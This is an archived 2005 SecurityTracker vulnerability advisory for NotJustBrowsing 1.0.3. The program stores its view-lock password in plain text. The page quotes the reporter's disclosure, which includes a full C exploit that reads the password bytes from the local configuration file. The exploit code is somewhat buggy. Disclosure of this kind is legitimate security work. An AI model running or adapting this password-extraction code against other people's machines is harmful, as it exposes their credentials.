SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Web Browser)  >  NotJustBrowsing Vendors:  NetLeaf Limited
NotJustBrowsing Discloses Application Password to Local Users
SecurityTracker Alert ID:  1013826
SecurityTracker URL:  http://securitytracker.com/id?1013826
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 28 2005
Impact:  Disclosure of authentication information
Exploit Included:  Yes  
Version(s): 1.0.3
Description:  Kozan reported a vulnerability in NotJustBrowsing. A local user can obtain an application password.

The application stores the three character 'View Lock Password' in the '\\Program Files\NetLeaf Limited\NotJustBrowsing\notjustbrowsing.prf' file in plain text format. A local user can view the file to obtain the password.
Impact:  A local user can obtain the 'View Local Password' value.
Solution:  No solution was available at the time of this entry.
Vendor URL:  notjustbrowsing.com/ (Links to External Site)
Cause:  Access control error
Underlying OS:  Windows (Any)
Reported By:  kozan@netmagister.com
Message History:   None.

 Source Message Contents
Date:  Wed, 27 Apr 2005 23:26:08 +0300
From:  kozan@netmagister.com
Subject:  NotJustBrowsing 1.0.3 discloses passwords to local users.

 
 
---------------------
Application:
---------------------
 
NotJustBrowsing 1.0.3
 
---------------------
Introduction:
---------------------
 
Vendor: www.NotJustBrowsing.com
 
Vendor Description: Drag and drop for visited links collection. Browsing
signals represented in color codes. View multiple pages in tiled-windows,
in a layout of your choice. Configurable visual representation for group
of URL links. Add notes with stored links. Share multiple Web links with
other users. Pop-ups blocking. Publish user guides, manuals, and help
contents. View lock: protect your stored Web links from being visited by
someone else. Protection: not let any body else modify your stored Web page
links. The ability to have multiple home pages. Each home position can be a
single document link or multiple documents collection. History as a collection
of ‘typed’ and ‘linked’ visits. Version 1.0.3 includes
configurable visual
representation for group of URL links (called ‘front cover’)
 
---------------------
Bug:
---------------------
 
NotJustBrowsing 1.0.3 stores "View Lock Password" (this is a three characters
pass.)
in "\\Program Files\NetLeaf Limited\NotJustBrowsing\notjustbrowsing.prf"
in plain text format without crypting and can be viewed by a local user
with a hex editor.
 
"notjustbrowsing.prf" password storing algorithm:
 
5. byte = 1. char of password
6. byte = 2. char of password
7. byte = 3. char of password
 
---------------------
Vendor Confirmed:
---------------------
 
No.
 
---------------------
Fix:
---------------------
 
There is no solution at the time of this entry.
 
---------------------
Exploit:
---------------------
 
 
/*****************************************************************
 
NotJustBrowsing 1.0.3 Local Password Disclosure Exploit by Kozan
 
Application: NotJustBrowsing 1.0.3
Procuder: www.notjustbrowsing.com
Vulnerable Description: NotJustBrowsing 1.0.3 discloses passwords
to local users.
 
Discovered & Coded by Kozan
Credits to ATmaCA
www.netmagister.com - www.spyinstructors.com
kozan@netmagister.com
 
*****************************************************************/
 
#include <stdio.h>
#include <windows.h>
 
 
HKEY hKey;
#define BUFSIZE 100
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;
 
 
char *bilgi_oku(int adres,int uzunluk)
{
	if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
					"SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
					0,
					KEY_QUERY_VALUE,
					&hKey
					) == ERROR_SUCCESS)
	{
 
	lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,(LPBYTE) prgfiles,
&dwBufLen);
	if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
	{
		RegCloseKey(hKey);
		return NULL;
	}
	RegCloseKey(hKey);
 
	strcat(prgfiles,"\\NetLeaf Limited\\NotJustBrowsing\\notjustbrowsing.prf");
 
	int i;
	FILE *fp;
	char ch[100];
	if((fp=fopen(prgfiles,"rb")) == NULL)
	{
		return "NOTINSTALLED";
	}
	fseek(fp,adres,0);
	for(i=0;i<uzunluk;i++)
	ch[i]=getc(fp);
	ch[i]=NULL;
	fclose(fp);
	return ch;
	}
}
 
int main()
{
	printf("NotJustBrowsing 1.0.3 Local Password Disclosure Exploit by Kozan\n");
	printf("Credits to ATmaCA\n");
	printf("www.netmagister.com - www.spyinstructors.com\n");
	printf("kozan@netmagister.com\n\n");
	if(bilgi_oku(4,3)==NULL)
	{
		printf("An error occured!\n");
		return -1;
	}
	if(bilgi_oku(4,3)=="NOTINSTALLED")
	{
		printf("NotJustBrowsing 1.0.3 is not installed on your system!\n");
		return -1;
	}
	printf("View Lock Password: %s",bilgi_oku(4,3));
	return 0;
}
 
 
 
 
Kozan...


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2005, SecurityGlobal.net LLC